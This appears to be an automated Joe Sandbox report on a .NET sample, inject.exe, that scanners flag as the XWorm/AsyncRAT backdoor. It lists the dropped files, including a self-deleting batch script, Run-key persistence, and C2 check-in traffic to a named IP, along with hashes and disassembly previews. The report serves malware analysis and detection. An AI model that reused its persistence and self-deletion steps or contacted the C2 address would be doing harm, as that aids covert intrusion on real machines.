              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets13
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              inject.exe79%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
              inject.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\VSREDIST.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\VSREDIST.exe79%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              79.110.49.2330%Avira URL Cloudsafe
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              79.110.49.233true
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameinject.exe, 00000000.00000002.1526464486.00000000026AA000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              79.110.49.233
              unknownGermany
              57287OTAVANET-ASCZtrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1465712
              Start date and time:2024-07-02 00:29:05 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 25s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:12
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:inject.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@7/5@0/1
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 40
              • Number of non-executed functions: 1
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target inject.exe, PID 7500 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: inject.exe
              TimeTypeDescription
              00:30:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run VSREDIST C:\Users\user\AppData\Roaming\VSREDIST.exe
              18:30:00API Interceptor9x Sleep call for process: inject.exe modified
              No context
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              OTAVANET-ASCZRSPTzXqdcr.exeGet hashmaliciousAsyncRAT, RedLine, StormKitty, SugarDump, XWormBrowse
              • 79.110.49.209
              3C5XR6Oj4g.exeGet hashmaliciousRedLineBrowse
              • 79.110.49.209
              17173975854cf2f83c89e5b8cb6d3f7fbfb13c91374b38f58a44f4c13da06a8fc0d75eb220903.dat-decoded.exeGet hashmaliciousXWormBrowse
              • 79.110.49.133
              3kQyFl1vUy.exeGet hashmaliciousSocks5SystemzBrowse
              • 79.110.49.184
              file.exeGet hashmaliciousSocks5SystemzBrowse
              • 79.110.49.184
              SecuriteInfo.com.Win64.PWSX-gen.29898.16595.exeGet hashmaliciousXWormBrowse
              • 79.110.49.133
              SecuriteInfo.com.Win64.PWSX-gen.10080.20186.exeGet hashmaliciousXWormBrowse
              • 79.110.49.133
              SecuriteInfo.com.Win64.PWSX-gen.7038.2908.exeGet hashmaliciousXWormBrowse
              • 79.110.49.133
              SecuriteInfo.com.Win64.PWSX-gen.3439.2109.exeGet hashmaliciousXWormBrowse
              • 79.110.49.133
              SecuriteInfo.com.Win64.DangerousSig.15709.19314.exeGet hashmaliciousXWormBrowse
              • 79.110.49.133
              No context
              No context
              Process:C:\Users\user\Desktop\inject.exe
              File Type:CSV text
              Category:dropped
              Size (bytes):1727
              Entropy (8bit):5.3718223239563105
              Encrypted:false
              SSDEEP:48:MxHKQwYHKGSI6o6+vxp3/elStHTHhAHKKkhHNp51qHGIs0HKD:iqbYqGSI6o9Zp/elStzHeqKkhtp5wmjB
              MD5:31EF241F1F20FCB19A5F31BA847A045B
              SHA1:EF969D35B4517591F0761196C80EC3596497D890
              SHA-256:06C7CEBB25F733FC6E607865E9268C51ED87F001379A5C35A8FB1BEF13756D31
              SHA-512:8643C52CA4C18D62EF54591EB342E60C11B40BFA0680B3ECD63BF4B9A67486CCEA4B5FA3EE0ACEAAB835D2501894B1AE8A0077FC19B8C51D1192D671A83E30F4
              Malicious:true
              Reputation:low
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0
              Process:C:\Users\user\Desktop\inject.exe
              File Type:DOS batch file, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):148
              Entropy (8bit):4.975604651070296
              Encrypted:false
              SSDEEP:3:mKDDCMNqTtv3DCHyOWORHvhs9M7AOwDwU1hGDCHyg4E2J5xAInTRIORVm5ZPy:hWKqTtLCH7O9MQDNeCHhJ23fTva5k
              MD5:5E1A9C54B161B50B88749A15967C9FA2
              SHA1:05813AB74D041D54447E8B4881027CEC9A003602
              SHA-256:69787C8DD6F829048C692A527D6BA631581AA308D7511AD70E10D877651B5B22
              SHA-512:45D813319F07278523DFD6E6C70517D831763E483D7106BABEF469A439F377BFAD61F0A8D6716686F34AA6DB804B627CEE711427B90FFACA46B03758959EEDD8
              Malicious:false
              Reputation:low
              Preview:@echo off..timeout 3 > NUL..CD C:\Users\user\Desktop..DEL "inject.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpA40.tmp.bat" /f /q..
              Process:C:\Users\user\Desktop\inject.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Jul 1 21:30:00 2024, mtime=Mon Jul 1 21:30:00 2024, atime=Mon Jul 1 21:30:00 2024, length=135168, window=hide
              Category:dropped
              Size (bytes):772
              Entropy (8bit):5.101671407194338
              Encrypted:false
              SSDEEP:12:8RwCi4pskChs3oY//mFsIL2ipY9OjAgEHsHDTYv1bA5tA5jmV:8RDpFffuOKg0AKYNbAnAxm
              MD5:0C4E8CE3206710BAC3157122FC62EE60
              SHA1:D53784D72E573C61A06899A4C3CDD72EAA5DBA2F
              SHA-256:47CB6A2FC11B231B47098F570F2C2E60710DFC5BC0650E960084E1E69C10AFC9
              SHA-512:A7B95CE91AFD8653C31BD09B48313BA92B90565F5484EDFDB236525128C597F16B20BF135A4DE66723E0635E1B150750D4A8F795BDF66CB16856745B478D3708
              Malicious:false
              Reputation:low
              Preview:L..................F.... ......5.......5.......5............................z.:..DG..Yr?.D..U..k0.&...&.......y.Yd... |.......{.5........t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.X............................d...A.p.p.D.a.t.a...B.V.1......X....Roaming.@......EW)B.X............................'B..R.o.a.m.i.n.g.....f.2......X.. .VSREDIST.exe..J.......X...X......."....................h...V.S.R.E.D.I.S.T...e.x.e.......[...............-.......Z...........[.If.....C:\Users\user\AppData\Roaming\VSREDIST.exe........\.....\.....\.....\.....\.V.S.R.E.D.I.S.T...e.x.e.`.......X.......830021...........hT..CrF.f4... .D..Yc...,...E...hT..CrF.f4... .D..Yc...,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
              Process:C:\Users\user\Desktop\inject.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):135168
              Entropy (8bit):4.8978796940686875
              Encrypted:false
              SSDEEP:3072:y+6ESFy9YROjYGBz65/M6If+3Js+3JFkKeTnr:VEy9EGxBt25
              MD5:48D87E281C7D316D72677C80ECD02E29
              SHA1:0A274418F78672B8515183A9241FFF465E9E8591
              SHA-256:E37072B84BC4474B48997AC346582AB4040659A31EDACBB88FB59D56609BA2D9
              SHA-512:82D2F1888C115ED4371585118693BE16F7251814287BE1917F1B81280E20759C476C690C1FEC7479C3BC9C1575825F9512EA362AF71F2CB2B6C7E43F049AEA6E
              Malicious:true
              Yara Hits:
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\VSREDIST.exe, Author: Joe Security
              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\VSREDIST.exe, Author: ditekSHen
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 79%
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^%.f................................. ........@.. .......................`............@.................................`...K.......l....................@....................................................... ............... ..H............text....~... ...................... ..`.rsrc...l...........................@..@.reloc.......@......................@..B........................H.......XS...K............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
              Process:C:\Windows\System32\timeout.exe
              File Type:ASCII text, with CRLF line terminators, with overstriking
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.41440934524794
              Encrypted:false
              SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
              MD5:3DD7DD37C304E70A7316FE43B69F421F
              SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
              SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
              SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
              Malicious:false
              Reputation:high, very likely benign file
              Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Entropy (8bit):4.8978796940686875
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              • Win32 Executable (generic) a (10002005/4) 49.78%
              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              File name:inject.exe
              File size:135'168 bytes
              MD5:48d87e281c7d316d72677c80ecd02e29
              SHA1:0a274418f78672b8515183a9241fff465e9e8591
              SHA256:e37072b84bc4474b48997ac346582ab4040659a31edacbb88fb59d56609ba2d9
              SHA512:82d2f1888c115ed4371585118693be16f7251814287be1917f1b81280e20759c476c690c1fec7479c3bc9c1575825f9512ea362af71f2cb2b6c7e43f049aea6e
              SSDEEP:3072:y+6ESFy9YROjYGBz65/M6If+3Js+3JFkKeTnr:VEy9EGxBt25
              TLSH:78D30682B600C2E1E47C4A73E556E5F10F32BC1FEB1A691F3984BF473973151AD12A6A
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^%.f................................. ........@.. .......................`............@................................
              Icon Hash:2f46d6d76e6a6c37
              Entrypoint:0x409eae
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x6683255E [Mon Jul 1 21:53:34 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
              Instruction
              jmp dword ptr [00402000h]
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x9e600x4b.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x18b6c.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x240000xc.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x20000x7eb40x80008a97dee514de440f7fe22491c070e45eFalse0.49365234375data5.690249087778276IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rsrc0xa0000x18b6c0x18c00bc3c4b9519d9ecb41b6d9f705a7a0c13False0.27762981376262624data4.261924264212458IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x240000xc0x200410dde75e596ac88218cc283e22f7235False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0xa1f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.41286307053941906
              RT_ICON0xc7980x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2834 x 2834 px/m0.34559518186112426
              RT_ICON0x109c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.7898936170212766
              RT_ICON0x10e280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.4800656660412758
              RT_ICON0x11ed00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m0.21581095469064238
              RT_GROUP_ICON0x226f80x4cdata0.7631578947368421
              RT_VERSION0x227440x23cdata0.4755244755244755
              RT_MANIFEST0x229800x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
              DLLImport
              mscoree.dll_CorExeMain
              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              07/02/24-00:30:09.393465TCP2852870ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes70004970579.110.49.233192.168.2.8
              TimestampSource PortDest PortSource IPDest IP
              Jul 2, 2024 00:30:01.750180006 CEST497057000192.168.2.879.110.49.233
              Jul 2, 2024 00:30:01.757086992 CEST70004970579.110.49.233192.168.2.8
              Jul 2, 2024 00:30:01.757215977 CEST497057000192.168.2.879.110.49.233
              Jul 2, 2024 00:30:01.922210932 CEST497057000192.168.2.879.110.49.233
              Jul 2, 2024 00:30:01.928345919 CEST70004970579.110.49.233192.168.2.8
              Jul 2, 2024 00:30:09.393465042 CEST70004970579.110.49.233192.168.2.8
              Jul 2, 2024 00:30:09.438118935 CEST497057000192.168.2.879.110.49.233
              Jul 2, 2024 00:30:10.310767889 CEST497057000192.168.2.879.110.49.233

              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:18:29:55
              Start date:01/07/2024
              Path:C:\Users\user\Desktop\inject.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\user\Desktop\inject.exe"
              Imagebase:0x490000
              File size:135'168 bytes
              MD5 hash:48D87E281C7D316D72677C80ECD02E29
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1526464486.000000000273C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1374666381.0000000000492000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1374666381.0000000000492000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Target ID:2
              Start time:18:30:09
              Start date:01/07/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpA40.tmp.bat""
              Imagebase:0x7ff610880000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:3
              Start time:18:30:09
              Start date:01/07/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6ee680000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:4
              Start time:18:30:09
              Start date:01/07/2024
              Path:C:\Windows\System32\timeout.exe
              Wow64 process (32bit):false
              Commandline:timeout 3
              Imagebase:0x7ff68b0b0000
              File size:32'768 bytes
              MD5 hash:100065E21CFBBDE57CBA2838921F84D6
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate
              Has exited:true

              Reset < >
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: 5d8463214a742f58b892d282635b61cee4df3900f24b740b604d0cb3a8dcb371
                • Instruction ID: 9c56e298c2c66a08a61662b73d5e33675fd0657ad73c51fed6ccb7f4703464b8
                • Opcode Fuzzy Hash: 5d8463214a742f58b892d282635b61cee4df3900f24b740b604d0cb3a8dcb371
                • Instruction Fuzzy Hash: 0B8260B4A3C90A4FEB98FF38C55567D72D2EF98304B508579D64EC32D6DE28AC528B40
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID: SAO_^
                • API String ID: 0-3650529936
                • Opcode ID: 3feff65f5352cc9f727a37e1796fa7679a6d922fe843fdf564a6bf102df5ff32
                • Instruction ID: 1cab5b0d89bc07cd15819f41ae076da54f3ea403c33524dbb505dc463c790dce
                • Opcode Fuzzy Hash: 3feff65f5352cc9f727a37e1796fa7679a6d922fe843fdf564a6bf102df5ff32
                • Instruction Fuzzy Hash: 2C12D4B1B2DA494FEB98FF78C4692B977D1EF88700F504579E54EC32D2DE28A8418741
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 28ddf641953651ff01bcccb42505517a5e158cd09f685ef849687070dc98db9a
                • Instruction ID: c52efb9333bd6db8ca6205a3e083f61862ba9923bd42784f309148040bec374c
                • Opcode Fuzzy Hash: 28ddf641953651ff01bcccb42505517a5e158cd09f685ef849687070dc98db9a
                • Instruction Fuzzy Hash: 58F1B47091CA8D8FEBA9EF28C8557E937D1FF59310F04826EE84DC7291DB3499458B82
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cdfc3bd00ae83419bc9c354e8fc3d8b335e738a6612c19654b3b5e8a3e56104b
                • Instruction ID: 6802dc33d7497daeef3eb16fd9d27c01ef3f2bbf01d3572da5d46bf11644a463
                • Opcode Fuzzy Hash: cdfc3bd00ae83419bc9c354e8fc3d8b335e738a6612c19654b3b5e8a3e56104b
                • Instruction Fuzzy Hash: F5E1D27091CA8E8FEBA9EF28C8567F977D1EF54310F14826ED84DC72A1CE7498418B81
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID: d
                • API String ID: 0-2564639436
                • Opcode ID: 20f62743a02934a8a504826562cf3d6af67aac7809e339b97bb34091a4d1ebe5
                • Instruction ID: 77a54668862ea4b8df5acbd528487013e0bfdfe6fa683cf217e0560dfd1d17b2
                • Opcode Fuzzy Hash: 20f62743a02934a8a504826562cf3d6af67aac7809e339b97bb34091a4d1ebe5
                • Instruction Fuzzy Hash: 3E21D7B1C1C25A4FEB00AFB4C8056EDBBE0EF46314F0441BBD689D71A2DA2C98458B91
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID: SAO_^
                • API String ID: 0-3650529936
                • Opcode ID: 8ec95e0b439f044f5d6f3b18096427fe54ad0ff00367c6abd05d6cc53c31c622
                • Instruction ID: 2e14c5e0930b80c58adb0691663d9d46acbbe0725f190d120b0cb8f8145b87ad
                • Opcode Fuzzy Hash: 8ec95e0b439f044f5d6f3b18096427fe54ad0ff00367c6abd05d6cc53c31c622
                • Instruction Fuzzy Hash: 721108A1D1D7824FE717BB38C9655683F61AF82714F4841B5D284C70E3CE2C68228B51
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID: SAO_^
                • API String ID: 0-3650529936
                • Opcode ID: a5c61312f90cb6a1d83e8d2b712df70c3dc4173e31963ead54b67911a254f86c
                • Instruction ID: 50be4f38d4b18e93ff59ade238017d7d5a579d75ee7fc7690b2ed81b3858164b
                • Opcode Fuzzy Hash: a5c61312f90cb6a1d83e8d2b712df70c3dc4173e31963ead54b67911a254f86c
                • Instruction Fuzzy Hash: BAF062B1D2C6168FE356EF34C54157973A2AF95318F548578D349831E1CF28B4718B40
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffb4b170000_inject.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8e3e9b36959d4f3ca40373a58eecd84014cb72c1b33029d75c7ace01dcde07de
                • Instruction ID: 494ea341d5da8d0aff93f9d6504202f19003f24a938f748660e9a3d8485131b5
                • Opcode Fuzzy Hash: 8e3e9b36959d4f3ca40373a58eecd84014cb72c1b33029d75c7ace01dcde07de
                • Instruction Fuzzy Hash: 40E15AA2A1DA850FE74AFB3C98652E83BE1EF86614B4841FFD189C71D3DD2858078791
                Memory Dump Source
                • Source File: 00000000.00000002.1527812730.00007FFB4B170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B170000, based on PE: false
                Joe Sandbox IDA Plugin
